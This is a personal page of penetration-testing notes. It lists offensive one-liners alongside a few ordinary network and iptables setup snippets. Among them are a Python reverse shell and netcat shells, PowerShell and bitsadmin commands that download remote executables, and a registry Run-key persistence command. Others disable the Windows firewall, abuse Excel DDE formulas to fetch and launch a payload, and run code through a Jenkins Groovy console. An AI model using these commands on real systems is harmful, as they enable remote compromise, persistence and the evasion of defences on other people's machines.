Bookmark and Share BitCoin Donate: 13t8gAWVpHP2ddxMp88d1NFpZjnFJC6UwK

Security Links

Brute force telnet with internal ids mech and no username

https://github.com/ashr/no-username-telnet-bruter


save cookies for reuse in cmdlines

 

wget -d --keep-session-cookies --save-cookies=cookies.txt --post-data="username=X&password=Y&login-form-type=Z" "https://"


Derp a remote service to your local ssh

ssh -R 9700:localhost:22 root@ZZZZZ


save a certificate to ubuntu/debian trust store (take note firefox has its own builtinstore)

ensure the cert is in PEM fomat:

openssl x509 -inform DER -outform PEM -in ./derp.cert.der -out derp.pem.crt

ensure the cert has a .crt extension

copy the file to your local ca cache:

cp ./derp.pem.crt /usr/local/share/ca-certificates

instruct debian to add it to the store:

dpkg-reconfigure ca-certificates

 

kill windows firewall:

 

netsh advfirewall set profiles state off

where profiles is AllProfiles, CurrentProfile, DomainProfile, PrivateProfile, or PublicProfile.

OR

Disable in registry, reboot machine with no network connectivity so domain policy dont overwrite

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall.

 

Derp for derped services:

19:28 <@ashr> $cmd.exe /c wmic service list brief

 

Check acls

cmd.exe /c icacls "C:\derp.txt"


Download a file with powershell 2

$client = New-Object “System.Net.WebClient”;$client.DownloadFile(“http://derp/derp.zip”,”c:\tmp\derp.zip”


Download a file with bitsadmin

bitsadmin.exe /transfer "JobName" http://x.x.x.x/x.exe "c:\temp\x.exe"


Autorun regedit one liner

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "X.exe" /d "c:\temp\X.exe"


mirrora site index:

wget -kEpnp -e robots=off http://

tor nmap:

proxychains nmap -Pn -sT -p 80 x.x.x.1-255|grep -B4 open > x.x.x.1-255

---------

 

Wifi Bridge IPTables setup:

iptables -A FORWARD -i wlan1 -o wlan0 -j ACCEPT

iptables -A FORWARD -i wlan0 -o wlan1 -m state --state ESTABLISHED,RELATED -j ACCEPT

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-port 8080 

 

---

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -s 10.42.0.0/16 -p tcp -m tcp --dport 443 -j REDIRECT --to-port 8443

----------

 

Flush IPTables:

#/bin/bash

#This function resets iptables to their default state

reset_iptables () {

  IPTABLES="$(which iptables)"

 

  # RESET DEFAULT POLICIES

  $IPTABLES -P INPUT ACCEPT

  $IPTABLES -P FORWARD ACCEPT

  $IPTABLES -P OUTPUT ACCEPT

  $IPTABLES -t nat -P PREROUTING ACCEPT

  $IPTABLES -t nat -P POSTROUTING ACCEPT

  $IPTABLES -t nat -P OUTPUT ACCEPT

  $IPTABLES -t mangle -P PREROUTING ACCEPT

  $IPTABLES -t mangle -P OUTPUT ACCEPT

 

  # FLUSH ALL RULES, ERASE NON-DEFAULT CHAINS

  $IPTABLES -F

  $IPTABLES -X

  $IPTABLES -t nat -F

  $IPTABLES -t nat -X

  $IPTABLES -t mangle -F

  $IPTABLES -t mangle -X

}

 

 

reset_iptables

---------


Setup Ethernet Bridge:

#/bin/bash

ifconfig eth0 0.0.0.0

ifconfig eth2 0.0.0.0

 

brctl addbr br0

brctl addif br0 eth0

brctl addif br0 eth2

 

dhclient br0

 

ifconfig br0 netmask 255.0.0.0

------

 

Block all DNS except from:

# Allow DNS (53) from <source IP>

iptables -A INPUT -p udp --dport 53 -s <source IP> -j ACCEPT

iptables -A INPUT -p tcp --dport 53 -s <source IP> -j ACCEPT

 

# Deny all other DNS requests

iptables -A INPUT -p udp --dport 53 -j DROP

iptables -A INPUT -p tcp --dport 53 -j DROP

 

# Delete above

iptables -D INPUT -p udp --dport 53 -j DROP

---------

Silly shells

nc -v -l -p 9997 -e /bin/bash
ncat -v -l -p 9997 -e /bin/sh

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

cmd.exe /c

 

Groovy Script (Jenkins)

def process = "c:\\temp\\x.exe".execute()
println "${process.text}"

 

#msf

window xp sp3 for demos and learners ms08_067_netapi

 

Excel fuckery

Download shell

=cmd|'/C bitsadmin.exe /transfer D http://192.168.1.107/pjep.exe c:\temp\pjep.exe'!'A10'

Popit

=cmd|'/C c:\temp\pjep.exe'!'A10'

 

Metasploit easy wins
Windows XP service pack 3
ms08_067

Beef easy wins
HTA

x64 stack frames